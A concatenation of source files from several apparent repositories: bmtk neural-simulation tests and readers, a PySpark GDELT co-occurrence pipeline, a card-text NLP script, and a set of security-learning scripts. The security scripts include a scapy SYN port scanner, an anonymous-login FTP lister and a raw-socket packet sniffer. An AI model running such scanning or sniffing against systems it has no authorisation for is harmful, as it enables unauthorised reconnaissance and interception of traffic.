name(self): """name of network containing these nodes""" return self._network_name @property def version(self): return self._version @property def gids(self): raise NotImplementedError() @property def node_types_table(self): return self._node_types_table def load(self, nodes_file, node_types_file): raise NotImplementedError() def get_node(self, gid, cache=False): return self[gid] def __len__(self): return self._N def __iter__(self): self._iter_index = 0 return self def next(self): if self._iter_index >= len(self): raise StopIteration node_row = self[self._iter_index] self._iter_index += 1 return node_row def __getitem__(self, gid): node_props = {'positions': np.random.rand(3), 'rotation': self._rot_delta*gid, 'weight': 0.0001*gid} return NodeRow(gid, node_props, self.__get_node_type_props(gid)) def __get_node_type_props(self, gid): if gid <= self._N/2: return self._node_types_table[101] else: return self._node_types_table[102] class EdgeRow(object): @property def with_dynamics_params(self): return False class EdgesFile(object): def __init__(self, target_nodes, source_nodes): self._target_nodes = target_nodes self._source_nodes = source_nodes self._edge_type_props = [ { 'node_type_id': 1, 'target_query': 'model_type="iaf_psc_alpha"', 'source_query': 'ei="e"', 'syn_weight': .10, 'delay': 2.0, 'dynamics_params': 'iaf_exc.json' }, { 'node_type_id': 2, 'target_query': 'model_type="iaf_psc_alpha"', 'source_query': 'ei="i"', 'syn_weight': -.10, 'delay': 2.0, 'dynamics_params': 'iaf_inh.json' }, { 'node_type_id': 3, 'target_query': 'model_type="izhikevich"', 'source_query': 'ei="e"', 'syn_weight': .20, 'delay': 2.0, 'dynamics_params': 'izh_exc.json' }, { 'node_type_id': 4, 'target_query': 'model_type="izhikevich"', 'source_query': 'ei="i"', 'syn_weight': -.20, 'delay': 2.0, 'dynamics_params': 'izh_inh.json' } ] @property def source_network(self): """Name of network containing the source gids""" return self._source_nodes.name @property def target_network(self): """Name of network containing the target gids""" return self._target_nodes.name def load(self, edges_file, edge_types_file): raise NotImplementedError() def edges_itr(self, target_gid): trg_node = self._target_nodes[target_gid] for src_node in self._source_nodes: edge_props = {'syn_weight': trg_node['weight']} #edge_type_props = {'edge_type_id': 1} yield EdgeRow(trg_node.gid, src_node.gid, edge_props, self.__get_edge_type_prop(src_node, trg_node)) #def __init__(self, trg_gid, src_gid, edge_props={}, edge_type_props={}): #raise NotImplementedError() def __len__(self): return len(self._source_nodes)*len(self._target_nodes) def __get_edge_type_prop(self, source_node, target_node): indx = 0 if source_node['model_type'] == 'iaf_psc_alpha' else 2 indx += 0 if target_node['ei'] == 'e' else 1 return self._edge_type_props[indx] ``` #### File: reports/spike_trains/test_sonata_adaptor_mpi.py ```python import pytest import numpy as np import h5py import tempfile from bmtk.utils.reports.spike_trains.spike_train_buffer import STMPIBuffer, STCSVMPIBufferV2 # from bmtk.utils.reports.spike_trains.adaptors.sonata_adaptors import write_sonata, write_sonata_itr from bmtk.utils.reports.spike_trains.spikes_file_writers import write_sonata, write_sonata_itr from bmtk.utils.sonata.utils import check_magic, get_version from bmtk.utils.reports.spike_trains import sort_order try: from mpi4py import MPI comm = MPI.COMM_WORLD bcast = comm.bcast MPI_rank = comm.Get_rank() MPI_size = comm.Get_size() except: MPI_rank = 0 MPI_size = 1 def create_st_buffer_mpi(st_cls): # Helper for creating spike_trains object if issubclass(st_cls, STCSVMPIBufferV2): tmp_dir = tempfile.mkdtemp() if MPI_rank == 0 else None tmp_dir = comm.bcast(tmp_dir, 0) return st_cls(cache_dir=tmp_dir) else: return st_cls() def tmpdir(): tmp_dir = tempfile.mkdtemp() if MPI_rank == 0 else None tmp_dir = comm.bcast(tmp_dir, 0) return tmp_dir def tmpfile(): tmp_file = tempfile.NamedTemporaryFile(suffix='.h5').name if MPI_rank == 0 else None tmp_file = comm.bcast(tmp_file, 0) return tmp_file @pytest.mark.parametrize('st_cls', [ STMPIBuffer, STCSVMPIBufferV2 ]) @pytest.mark.parametrize('write_fnc', [ write_sonata, write_sonata_itr ]) def test_write_sonata(st_cls, write_fnc): st = create_st_buffer_mpi(st_cls) st.add_spikes(population='V1', node_ids=MPI_rank, timestamps=[MPI_rank]*5) st.add_spike(population='V2', node_id=MPI_size, timestamp=float(MPI_rank)) st.add_spikes(population='R{}'.format(MPI_rank), node_ids=0, timestamps=[0.1, 0.2, 0.3, 0.4]) tmp_h5 = tmpfile() write_fnc(tmp_h5, st) if MPI_rank == 0: # Warnings: some systems creates lock even for reading an hdf5 file with h5py.File(tmp_h5, 'r') as h5: assert(check_magic(h5)) assert(get_version(h5) is not None) assert(set(h5['/spikes'].keys()) >= {'R{}'.format(r) for r in range(MPI_size)} | {'V1', 'V2'}) assert(set(h5['/spikes/V1']['node_ids'][()]) == {i for i in range(MPI_size)}) assert(set(h5['/spikes/V2']['timestamps'][()]) == {float(i) for i in range(MPI_size)}) for r in range(MPI_size): grp = h5['/spikes/R{}'.format(r)] assert(np.all(grp['node_ids'][()] == [0, 0, 0, 0])) assert(np.allclose(grp['timestamps'][()], [0.1, 0.2, 0.3, 0.4])) @pytest.mark.parametrize('st_cls', [ STMPIBuffer, STCSVMPIBufferV2 ]) @pytest.mark.parametrize('write_fnc', [ write_sonata, write_sonata_itr ]) def test_write_sonata_byid(st_cls, write_fnc): st = create_st_buffer_mpi(st_cls) st.add_spikes(population='V1', node_ids=[MPI_size + MPI_rank, MPI_rank], timestamps=[0.5, 1.0]) tmp_h5 = tmpfile() write_fnc(tmp_h5, st, sort_order=sort_order.by_id) if MPI_rank == 0: with h5py.File(tmp_h5, 'r') as h5: assert(check_magic(h5)) assert(get_version(h5) is not None) assert(np.all(h5['/spikes/V1']['node_ids'][()] == list(range(MPI_size*2)))) assert(len(h5['/spikes/V1']['timestamps'][()]) == MPI_size * 2) @pytest.mark.parametrize('st_cls', [ STMPIBuffer, STCSVMPIBufferV2 ]) @pytest.mark.parametrize('write_fnc', [ write_sonata, write_sonata_itr ]) def test_write_sonata_bytime(st_cls, write_fnc): st = create_st_buffer_mpi(st_cls) st.add_spikes(population='V1', node_ids=[MPI_rank, MPI_rank], timestamps=np.array([MPI_rank/10.0, (MPI_size + MPI_rank)/10.0], dtype=np.float)) tmp_h5 = tmpfile() write_fnc(tmp_h5, st, sort_order=sort_order.by_time) if MPI_rank == 0: with h5py.File(tmp_h5, 'r') as h5: assert(check_magic(h5)) assert(get_version(h5) is not None) assert(len(h5['/spikes/V1']['node_ids'][()]) == MPI_size*2) assert(np.all(np.diff(h5['/spikes/V1']['timestamps'][()]) > 0)) @pytest.mark.parametrize('st_cls', [ STMPIBuffer, STCSVMPIBufferV2 ]) @pytest.mark.parametrize('write_fnc', [ write_sonata, write_sonata_itr ]) def test_write_sonata_empty(st_cls, write_fnc): st = create_st_buffer_mpi(st_cls) tmp_h5 = tmpfile() write_fnc(tmp_h5, st) if MPI_rank == 0: with h5py.File(tmp_h5, 'r') as h5: assert(check_magic(h5)) assert(get_version(h5) is not None) assert('/spikes' in h5) if __name__ == '__main__': # test_write_sonata(STMPIBuffer, write_sonata) # test_write_sonata(STMPIBuffer, write_sonata_itr) # test_write_sonata_byid(STMPIBuffer, write_sonata) # test_write_sonata_bytime(STMPIBuffer, write_sonata) test_write_sonata_empty(STMPIBuffer, write_sonata) ``` #### File: bmtk/utils/hdf5_helper.py ```python import sys if sys.version_info[0] == 3: using_py3 = True range_itr = range else: using_py3 = False range_itr = xrange def get_attribute_h5(h5obj, attribut_name, default=None): val = h5obj.attrs.get(attribut_name, default) if using_py3 and isinstance(val, bytes): # There is an but with h5py returning unicode/str based attributes as bytes val = val.decode() return val ``` #### File: reports/compartment/compartment_reader.py ```python import h5py import numpy as np from .core import CompartmentReaderABC from bmtk.utils.hdf5_helper import get_attribute_h5 class _CompartmentPopulationReaderVer01(CompartmentReaderABC): sonata_columns = ['element_ids', 'element_pos', 'index_pointer', 'node_ids', 'time'] def __init__(self, pop_grp, pop_name): self._data_grp = pop_grp['data'] self._mapping = pop_grp['mapping'] self._population = pop_name self._gid2data_table = {} if self._mapping is None: raise Exception('could not find /mapping group') gids_ds = self._mapping[self.node_ids_ds] # ['node_ids'] index_pointer_ds = self._mapping['index_pointer'] for indx, gid in enumerate(gids_ds): self._gid2data_table[gid] = slice(index_pointer_ds[indx], index_pointer_ds[indx+1]) time_ds = self._mapping['time'] self._t_start = np.float(time_ds[0]) self._t_stop = np.float(time_ds[1]) self._dt = np.float(time_ds[2]) self._n_steps = int((self._t_stop - self._t_start) / self._dt) self._custom_cols = {col: grp for col, grp in self._mapping.items() if col not in self.sonata_columns and isinstance(grp, h5py.Dataset)} def _get_index(self, node_id): return self._gid2data_table[node_id] @property def populations(self): return [self._population] @property def data_ds(self): return self._data_grp @property def node_ids_ds(self): return 'node_ids' def get_population(self, population, default=None): raise NotImplementedError() def units(self, population=None): return get_attribute_h5(self.data_ds, 'units', None) #return self.data_ds.attrs.get('units', None) def variable(self, population=None): return get_attribute_h5(self.data_ds, 'variable', None) #return self.data_ds.attrs.get('variable', None) def tstart(self, population=None): return self._t_start def tstop(self, population=None): return self._t_stop def dt(self, population=None): return self._dt def n_steps(self, population=None): return self._n_steps def time(self, population=None): return self._mapping['time'][()] def time_trace(self, population=None): return np.linspace(self.tstart(), self.tstop(), num=self._n_steps, endpoint=True) def node_ids(self, population=None): return self._mapping['node_ids'][()] def index_pointer(self, population=None): return self._mapping['index_pointer'][()] def element_pos(self, node_id=None, population=None): if node_id is None: return self._mapping['element_pos'][()] else: return self._mapping['element_pos'][self._get_index(node_id)]#[indx_beg:indx_end] def element_ids(self, node_id=None, population=None): if node_id is None: return self._mapping['element_ids'][()] else: #indx_beg, indx_end = self._get_index(node_id) #return self._mapping['element_ids'][self._get_index(node_id)]#[indx_beg:indx_end] return self._mapping['element_ids'][self._get_index(node_id)] def n_elements(self, node_id=None, population=None): return len(self.element_pos(node_id)) def data(self, node_id=None, population=None, time_window=None, sections='all', **opts): # filtered_data = self._data_grp multi_compartments = True if node_id is not None: node_range = self._get_index(node_id) if sections == 'origin' or self.n_elements(node_id) == 1: # Return the first (and possibly only) compartment for said gid gid_slice = node_range multi_compartments = False elif sections == 'all': # Return all compartments gid_slice = node_range #slice(node_beg, node_end) else: # return all compartments with corresponding element id compartment_list = list(sections) if np.isscalar(sections) else sections gid_slice = [i for i in self._get_index(node_id) if self._mapping['element_ids'] in compartment_list] else: gid_slice = slice(0, self._data_grp.shape[1]) if time_window is None: time_slice = slice(0, self._n_steps) else: if len(time_window) != 2: raise Exception('Invalid time_window, expecting tuple [being, end].') window_beg = max(int((time_window[0] - self.tstart()) / self.dt()), 0) window_end = min(int((time_window[1] - self.tstart()) / self.dt()), self._n_steps / self.dt()) time_slice = slice(window_beg, window_end) filtered_data = np.array(self._data_grp[time_slice, gid_slice]) return filtered_data if multi_compartments else filtered_data[:] def custom_columns(self, population=None): return {k: v[()] for k,v in self._custom_cols.items()} def get_column(self, column_name, population=None): return self._mapping[column_name][()] def get_element_data(self, node_id, population=None): pass def get_report_description(self, population=None): pass def __getitem__(self, population): return self class _CompartmentPopulationReaderVer00(_CompartmentPopulationReaderVer01): sonata_columns = ['element_id', 'element_pos', 'index_pointer', 'gids', 'time'] def node_ids(self, population=None): return self._mapping[self.node_ids_ds][()] @property def node_ids_ds(self): return 'gids' def element_ids(self, node_id=None, population=None): if node_id is None: return self._mapping['element_id'][()] else: #indx_beg, indx_end = self._get_index(node_id) #return self._mapping['element_id'][self._get_index(node_id)]#[indx_beg:indx_end] return self._mapping['element_id'][self._get_index(node_id)] # [indx_beg:indx_end] class CompartmentReaderVer01(CompartmentReaderABC): def __init__(self, filename, mode='r', **params): self._h5_handle = h5py.File(filename, mode) self._h5_root = self._h5_handle[params['h5_root']] if 'h5_root' in params else self._h5_handle['/'] self._popgrps = {} self._mapping = None if 'report' in self._h5_handle.keys(): report_grp = self._h5_root['report'] for pop_name, pop_grp in report_grp.items(): self._popgrps[pop_name] = _CompartmentPopulationReaderVer01(pop_grp=pop_grp, pop_name=pop_name) else: self._default_population = 'pop_na' self._popgrps[self._default_population] = _CompartmentPopulationReaderVer00(pop_grp=self._h5_root, pop_name=self._default_population) if 'default_population' in params: # If user has specified a default population self._default_population = params['default_population'] if self._default_population not in self._popgrps.keys(): raise Exception('Unknown population {} found in report.'.format(self._default_population)) elif len(self._popgrps.keys()) == 1: # If there is only one population in the report default to that self._default_population = list(self._popgrps.keys())[0] else: self._default_population = None @property def default_population(self): if self._default_population is None: raise Exception('Please specify a node population.') return self._default_population @property def populations(self): return list(self._popgrps.keys()) def get_population(self, population, default=None): if population not in self.populations: return default return self[population] def units(self, population=None): population = population or self.default_population return self[population].units() def variable(self, population=None): population = population or self.default_population return self[population].variable() def tstart(self, population=None): population = population or self.default_population return self[population].tstart() def tstop(self, population=None): population = population or self.default_population return self[population].tstop() def dt(self, population=None): population = population or self.default_population return self[population].dt() def time_trace(self, population=None): population = population or self.default_population return self[population].time_trace() def node_ids(self, population=None): population = population or self.default_population return self[population].node_ids() def element_pos(self, node_id=None, population=None): population = population or self.default_population return self[population].element_pos(node_id) def element_ids(self, node_id=None, population=None): population = population or self.default_population return self[population].element_ids(node_id) def n_elements(self, node_id=None, population=None): population = population or self.default_population return self[population].n_elements(node_id) def data(self, node_id=None, population=None, time_window=None, sections='all', **opt_attrs): population = population or self.default_population return self[population].data(node_id=node_id, time_window=time_window, sections=sections, **opt_attrs) def custom_columns(self, population=None): population = population or self.default_population return self[population].custom_columns(population) def get_column(self, column_name, population=None): population = population or self.default_population return self[population].get_column(column_name) def get_node_description(self, node_id, population=None): population = population or self.default_population return self[population].get_node_description(node_id) def get_report_description(self, population=None): population = population or self.default_population return self[population].get_report_description() def __getitem__(self, population): return self._popgrps[population] ```
{ "source": "AAbercrombie0492/gdelt_distributed_architecture", "score": 3 }
#### File: src/data/gkg_cooccurences_pyspark.py ```python from pyspark import SparkContext, SparkConf, SQLContext from pyspark.sql.functions import explode, udf, split, explode, countDistinct from pyspark.sql.types import * from pyspark.sql.functions import * from pyspark.sql import Row, SparkSession from pyspark import * import boto from boto.s3.key import Key from boto.s3.connection import S3Connection import pyspark import itertools import datetime def get_cooccurences(allnames_string): ''' Map function to get a list of entity pairs(Cartesian Product) from an AllNames column string. ''' entities = allnames_string.split(';') entitites_names = [row.split(',', 2)[0] for row in entities] cooccurences = itertools.product(entitites_names, entitites_names) cooccurences_list= map(list, cooccurences) return cooccurences_list def get_top_mentions(gkg_df, col): ''' Returns an ordered dataframe of named entity count corresponding to an arbitrary column. ''' log.warn("GETTING COUNTS AND ORDERED DATAFRAME FOR {} COLUMN".format(col)) themes = gkg_df.select(col) # split_text = udf(lambda x: x.split(';')) themes_split_col = pyspark.sql.functions.split(gkg_df[col], ';') themes_df = gkg_df.select(explode(themes_split_col).alias(col)) theme_counts = themes.groupBy(col).count().orderBy('count', ascending=False) log.warn("FINISHED GETTING COUNTS AND ORDERED DATAFRAME FOR {} COLUMN".format(col)) return theme_counts def query_time(): 'NEED TO ADD CONTINGENCIES FOR 2 DIGIT DATES' now = datetime.datetime.now() today_seq = '{}0{}0{}'.format(now.year,now.month,now.day) return today_seq def make_allnames_df(): ''' Returns a filtered dataframe where rows have multiple named entitites. ''' log.warn("CREATING ALLNAMES DATAFRAME") gkg_allnames_df = master_gkg.filter("AllNames LIKE '%;%'").select(master_gkg.AllNames) gkg_allnames_df.createOrReplaceTempView('gkg_allnames') gkg_allnames_today_df = master_gkg_today.filter("AllNames LIKE '%;%'").select(master_gkg_today.AllNames) gkg_allnames_today_df.createOrReplaceTempView('gkg_allnames_today') log.warn("FINISHED CREATING ALLNAMES DATAFRAME") return gkg_allnames_today_df def make_cooccurence_df(): ''' Creates the Cooccurences dataframe with entity pairs, counts, and weights. ''' log.warn("ABOUT TO CREATE ALLNAMES DATAFRAME") gkg_allnames_today_df = make_allnames_df() gkg_allnames_today_df.createOrReplaceTempView('gkg_allnames_today') log.warn("FINISHED CREATING ALLNAMES DATAFRAME") log.warn("CREATING LISTS OF COOCCURENCES DATAFRAME") coocs_today_lists = sqlContext.sql('SELECT AllNames, get_cooccurences(gkg_allnames_today.AllNames) AS Cooccurences FROM gkg_allnames_today') log.warn("APPLYING EXPLODE FUNCTION TO GET COOCCURENCE DATAFRAME") coocs_today_explode = coocs_today_lists.select(explode("Cooccurences").alias("cooccurence")) log.warn("GROUPING COOCCURENCE DATAFRAME BY KEYS TO GET UNIQUE COUNTS") coocs_counts = coocs_today_explode.groupby(coocs_today_explode.cooccurence).count().alias('Counts') log.warn("ORDERING AND FORMATING COOCCURENCE DATAFRAME") coocs_counts_ordered = coocs_counts.orderBy('count', ascending=False) coocs_counts_ordered.createOrReplaceTempView('coocs_counts_ordered') coocs_counts_ordered = sqlContext.sql( "SELECT row_number()\ OVER (ORDER BY count DESC) AS rn, * \ FROM coocs_counts_ordered") log.warn("GETTING THE TOTAL NUMBER OF COOCCURENCES") total_counts = coocs_counts_ordered.rdd.map(lambda x: float(x["count"])).reduce(lambda x, y: x+y) log.warn("WEIGHTING COOCCURENCE KEYS BY FREQUENCY") weights = coocs_counts_ordered.rdd.map(lambda x: x['count'] /total_counts) row = Row("weight") weights_df = weights.map(row).toDF() weights_df.createOrReplaceTempView('weights_df') weights_df = sqlContext.sql( "SELECT row_number() \ OVER(ORDER BY weight DESC) AS rn, * \ FROM weights_df") log.warn("APPLYING JOIN OF DF AND WEIGHTS TO FINALIZE COOCCURENCE DF") coocs_counts_ordered = coocs_counts_ordered.join(weights_df, weights_df.rn == coocs_counts_ordered.rn).drop(weights_df.rn) log.warn("FINISHED CREATING COOCCURENCE DATAFRAME") return coocs_counts_ordered if __name__ == '__main__': sc = SparkContext() sqlContext = SQLContext(sc) APP_NAME = "Global Knowledge Graph" conf = SparkConf().setAppName(APP_NAME) conf = conf.setMaster("local[*]") spark = SparkSession.builder.appName("APP_NAME") \ .config("spark.some.config.option", "some-value") \ .getOrCreate() sc.setLogLevel(logLevel="WARN") log4jLogger = sc._jvm.org.apache.log4j log = log4jLogger.LogManager.getLogger(__name__) log.warn('SETTING COMPRESSION CODEC AS GZIP') sqlContext.setConf("spark.sql.parquet.compression.code","gzip") log.warn("LOADING TODAY'S PARQUET FILES") today = query_time() gkg_today = spark.read.parquet("s3a://gdelt-streaming/{}*".format(today)) gkg_today.createOrReplaceTempView("gkg_today") log.warn("CREATING TODAY'S MASTER DATAFRAME") master_gkg_today = spark.sql("SELECT GKGRECORDID, cast(DATE AS STRING), AllNames, Persons, Organizations, Themes, Locations FROM gkg_today LIMIT 10") master_gkg_today.registerTempTable("master_gkg_today") log.warn("FINISHED TODAY'S MASTER DATAFRAME") log.warn("LOADING ALL PARQUET FILES") gkg = spark.read.parquet("s3a://gdelt-streaming/*.parquet") gkg.createOrReplaceTempView("gkg_view") log.warn("CREATING ALLTIME MASTER DATAFRAME") master_gkg = spark.sql("SELECT GKGRECORDID, cast(DATE AS STRING), AllNames, Persons, Organizations, Themes, Locations FROM gkg_view LIMIT 10") master_gkg.registerTempTable('master_gkg') log.warn("REGISTERING GET_OCCURENCES SQL FUNCTION") pyspark.sql.UDFRegistration(get_cooccurences) sqlContext.registerFunction("get_cooccurences", get_cooccurences, ArrayType(ArrayType(StringType()))) log.warn("FINISHED REGISTERING GET_OCCURENCES SQL FUNCTION") log.warn("ABOUT TO CREATE COOCCURENCES DATAFRAME") cooccurences = make_cooccurence_df() log.warn("UPLOADING CONCURRENCES TO S3") cooccurences_string = 'cooccurences_{}'.format(datetime.datetime.now()) cooccurences.write.parquet("s3a://gdelt-spark-output/{}".format(cooccurences_string)) themes = get_top_mentions(gkg_today, 'Themes') people = get_top_mentions(gkg_today, 'Persons') organizations = get_top_mentions(gkg_today, 'Organizations') log.warn("UPLOADING Themes, People, and Orgs to S3") themes_string = 'themes_{}'.format(datetime.datetime.now()) themes.write.parquet("s3a://gdelt-spark-output/{}".format(themes_string)) people_string = 'people_{}'.format(datetime.datetime.now()) people.write.parquet("s3a://gdelt-spark-output/{}".format(people_string)) orgs_string = 'organizations_{}'.format(datetime.datetime.now()) organizations.write.parquet("s3a://gdelt-spark-output/{}".format(orgs_string)) log.warn("UPLOADING COOCCURENCES, THEMES, PEOPLE, AND ORGS TO S3 AS JSON") output_dir = "s3a://gdelt-spark-output/" orgs_txt_string = 'organizations_json_{}'.format(datetime.datetime.now()) organizations.write.json("s3a://gdelt-spark-output/{}".format(orgs_txt_string)) themes_txt_string = 'themes_json_{}'.format(datetime.datetime.now()) themes.write.json("s3a://gdelt-spark-output/{}".format(themes_txt_string)) people_txt_string = 'themes_json_{}'.format(datetime.datetime.now()) people.write.json("s3a://gdelt-spark-output/{}".format(people_txt_string)) cooccurences_txt_string = 'cooccurences_json_{}'.format(datetime.datetime.now()) cooccurences.write.json("s3a://gdelt-spark-output/{}".format(cooccurences_txt_string)) log.warn("UPLOADING COOCCURENCES, THEMES, PEOPLE, AND ORGS TO REDSHIFT") output_dir = "s3a://gdelt-spark-output/" cooccurences.write \ .format("com.databricks.spark.redshift")\ .option("url", "jdbc:redshift://gdelt-cluster.cmgwgjhrlvjy.us-west-2.redshift.amazonaws.com:5439/gdelt?user={}&password={}".format(redshift_usrname, redshift_password)) \ .option("dbtable", "cooccurences") \ .option("tempdir", output_dir) \ .mode("overwrite") \ .save() themes.write \ .format("com.databricks.spark.redshift")\ .option("url", "jdbc:redshift://gdelt-cluster.cmgwgjhrlvjy.us-west-2.redshift.amazonaws.com:5439/gdelt?user={}&password={}".format(redshift_usrname, redshift_password)) \ .option("dbtable", "themes") \ .option("tempdir", output_dir) \ .mode("overwrite") \ .save() people.write \ .format("com.databricks.spark.redshift")\ .option("url", "jdbc:redshift://gdelt-cluster.cmgwgjhrlvjy.us-west-2.redshift.amazonaws.com:5439/gdelt?user={}&password={}".format(redshift_usrname, redshift_password)) \ .option("dbtable", "people") \ .option("tempdir", output_dir) \ .mode("overwrite") \ .save() organizations.write \ .format("com.databricks.spark.redshift")\ .option("url", "jdbc:redshift://gdelt-cluster.cmgwgjhrlvjy.us-west-2.redshift.amazonaws.com:5439/gdelt?user={}&password={}".format(redshift_usrname, redshift_password)) \ .option("dbtable", "organizations") \ .option("tempdir", output_dir) \ .mode("overwrite") \ .save() log.warn("SUCCESS! EVERYTHING WORKED!") ```
{ "source": "Aabglov/mtg", "score": 3 }
#### File: mtg/nlp/onehot_sentences.py ```python import warnings warnings.filterwarnings(action = 'ignore') from collections import defaultdict,Counter import pickle import pathlib import json import os,sys HERE = pathlib.Path().absolute().parent.__str__() sys.path.append(os.path.join(pathlib.Path().absolute().parent,"card_db")) # Hax lol #pathlib.Path(__file__).parent.absolute() import pandas as pd import init_db CONN = init_db.CONN CURSOR = CONN.cursor() UNKNOWN_KEY = "UNK" # FETCH DATA ONE_HOT_DATA = "onehot_data.pkl" try: with open(ONE_HOT_DATA,"rb") as f: df = pickle.load(f) print("loaded data") except: print("no pickled data, recreating...") df = pd.read_sql_query("""SELECT c.name, c.text as text, c.min_text as min_text, c.rarity, c.convertedManaCost as cmc, c.type, c.types, c.manaCost as mana_cost, c.colorIdentity as color_id FROM cards c JOIN legalities l ON (l.uuid = c.uuid AND l.format = "vintage") JOIN sets s ON instr(c.printings, s.code) > 0 WHERE s.releaseDate BETWEEN "2008-01-01" AND "2017-01-01" AND c.type LIKE "%Creature%" AND c.colorIdentity = "B" AND c.rarity = "common" GROUP BY c.name;""", CONN) print(f"Number of cards found: {len(df)}") # with open(ONE_HOT_DATA,"wb+") as f: # pickle.dump(df,f) # df = pd.read_sql_query("SELECT * FROM cards LIMIT 1;",CONN) # print(df.iloc[0]) # for k,v in df.dtypes.items(): # print(k,v) # HODOR all_texts = [] for i,row in df.iterrows(): if row["min_text"]: # account for lands and shit sentences = row["min_text"].split("\\") for s in sentences: #print(s) all_texts.append(s) one_hot_sentences = set() counter = Counter(all_texts) for k,v in counter.most_common(10): #print(k,v) #if v >= 10: one_hot_sentences.add(k) one_hot_sentences.add(UNKNOWN_KEY) one_hot_sentences = tuple(sorted(one_hot_sentences)) UNKNOWN_INDEX = one_hot_sentences.index(UNKNOWN_KEY) for o in one_hot_sentences: print(f"{o}, Number of occurrences: {counter[o]}, index: {one_hot_sentences.index(o)}") print(len(one_hot_sentences)) #print(one_hot_sentences.index("totem armor")) HODOR def onehot(sentences): oh = [0] * len(one_hot_sentences) # treating the one hot list as global for s in sentences: try: i = one_hot_sentences.index(s) oh[i] += 1 except ValueError: oh[UNKNOWN_INDEX] += 1 # This can lead to non-one-hot formatted sentences, but that's okay for now return oh for i, row in df.iterrows(): if row["min_text"]: # account for lands and shit sentences = row["min_text"].split("\\") o = onehot(sentences) if sum(o) > o[UNKNOWN_INDEX]: print(row["name"],row["cmc"], row["mana_cost"]) print(row["type"],row["types"]) print(row["power"], row["toughness"]) print(sentences) print(o) HODOR ```
{ "source": "AabhaasSinghal/python_scripts", "score": 3 }
#### File: python_scripts/scanner/Multi-Threaded-Ftp.py ```python import threading import Queue import time from ftplib import FTP # Thanks to SPSE-445 for the list :) ftpHostList = [ 'ftp.x.org', 'ftp4.FreeBSD.org', 'ftp.ncsa.uiuc.edu', 'ftp.mozilla.org', 'ftp.crans.org' ] class WorkerThread(threading.Thread) : def __init__(self, queue, tid) : threading.Thread.__init__(self) self.queue = queue self.tid = tid print "Worker %d Reporting for Service Sir!" %self.tid def run(self) : while True : host = None try : host = self.queue.get(timeout=1) except Queue.Empty : print "Worker %d exiting..." % self.tid return # login to ftp host anonymously and list the dirs try : conn = FTP(host) conn.login() print 'Host: ' +host print conn.retrlines('LIST') except : print "Error in listing " +host raise self.queue.task_done() queue = Queue.Queue() threads = [] for i in range(1, 10) : print "Creating WorkerThread : %d"%i worker = WorkerThread(queue, i) worker.setDaemon(True) worker.start() threads.append(worker) print "WorkerThread %d Created!"%i for host in ftpHostList : queue.put(host) queue.join() # wait for all threads to exit for item in threads : item.join() print "Scanning Complete!" ``` #### File: python_scripts/scanner/Multi-Threaded-Scanner.py ```python import threading import Queue import time from scapy.all import * class WorkerThread(threading.Thread) : def __init__(self, queue, tid) : threading.Thread.__init__(self) self.queue = queue self.tid = tid print "Worker %d Reporting for Service Sir!" %self.tid def run(self) : total_ports = 0 while True : port = 0 try : port = self.queue.get(timeout=1) except Queue.Empty : print "Worker %d exiting. Scanned %d ports ..." % (self.tid, total_ports) return # port scanning to begin # we rely on scapy to do this ip = sys.argv[1] response = sr1(IP(dst=ip)/TCP(dport=port, flags="S"), verbose=False, timeout=.2) # only checking for SYN-ACK == flags = 18 # filtererd ports etc. is another story altogether if response : if response[TCP].flags == 18 : print "ThreadId %d: Received port number %d Status: OPEN" %(self.tid, port) self.queue.task_done() total_ports += 1 queue = Queue.Queue() threads = [] for i in range(1, 10) : print "Creating WorkerThread : %d"%i worker = WorkerThread(queue, i) worker.setDaemon(True) worker.start() threads.append(worker) print "WorkerThread %d Created!"%i for j in range (1,1000) : queue.put(j) queue.join() # wait for all threads to exit for item in threads : item.join() print "Scanning Complete!" ``` #### File: python_scripts/servers/multi_process_echo_server.py ```python import socket import sys from multiprocessing import Process def EchoClientHandler(clientSocket, addr) : while 1: client_data = clientSocket.recv(2048) if client_data : clientSocket.send(client_data) else : clientSocket.close() return echoServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM) echoServer.bind(("0.0.0.0", int(sys.argv[1]))) echoServer.listen(10) workerProcesses = [] while 1: cSock, addr = echoServer.accept() # start a new thread to service print "Starting new thread to service client \n" worker = Process(target=EchoClientHandler, args= (cSock, addr)) worker.start() workerProcesses.append(worker) ``` #### File: python_scripts/servers/multi_threaded_echo_server.py ```python import socket import thread import sys def EchoClientHandler(clientSocket, addr) : while 1: client_data = clientSocket.recv(2048) if client_data : clientSocket.send(client_data) else : clientSocket.close() return echoServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM) echoServer.bind(("0.0.0.0", int(sys.argv[1]))) echoServer.listen(10) while 1: cSock, addr = echoServer.accept() # start a new thread to service print "Starting new thread to service client \n" thread.start_new_thread(EchoClientHandler, (cSock, addr)) ``` #### File: python_scripts/sniffer/TCPSniffer_Hendrik.py ```python import socket, struct, binascii global IP, TCP, UDP, HTTP IP, TCP, UDP, HTTP = False, False, False, False def parseETH(header): global IP eth_hdr = struct.unpack("!6s6s2s", header) source = binascii.hexlify(eth_hdr[0]) dest = binascii.hexlify(eth_hdr[1]) print "\nEthernet" print "-Source:\t ", source print "-Dest:\t\t ", dest if binascii.hexlify(eth_hdr[2]) == '0800': IP = True def parseIP(header): global TCP, UDP ip_hdr = struct.unpack("!9s1s2s4s4s", header) source = socket.inet_ntoa(ip_hdr[3]) dest = socket.inet_ntoa(ip_hdr[4]) print "\nIP" print "-Source:\t ", source print "-Dest:\t\t ", dest if binascii.hexlify(ip_hdr[1]) == '06': TCP = True elif binascii.hexlify(ip_hdr[1]) == '11': UDP = True def parseTCP(header): global HTTP tcp_hdr = struct.unpack("!2s2s16s", header) src_port = binascii.hexlify(tcp_hdr[0]) dst_port = binascii.hexlify(tcp_hdr[1]) #converted ports in hex to decimal value print "\nTCP" print "-Source port:\t\t", int(src_port, 16) print "-Destination port:\t", int(dst_port, 16) if (int(src_port, 16) == 80 ) or (int(dst_port, 16) == 80): HTTP = True def parseUDP(header): udp_hdr = struct.unpack("!2s2s16s", header) src_port = binascii.hexlify(udp_hdr[0]) dst_port = binascii.hexlify(udp_hdr[1]) #converted ports in hex to decimal value print "\nUDP" print "-Source port:\t\t", int(src_port, 16) print "-Destination port:\t", int(dst_port, 16) def parseHTTP(data): print data rawSocket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x800)) while True: pkt = rawSocket.recvfrom(2048) print "Received packet:" parseETH(pkt[0][0:14]) if IP: parseIP(pkt[0][14:34]) if TCP: parseTCP(pkt[0][34:54]) elif UDP: parseUDP(pkt[0][34:54]) if HTTP: parseHTTP(pkt[0][54:]) print "\nDone\n\n" ```
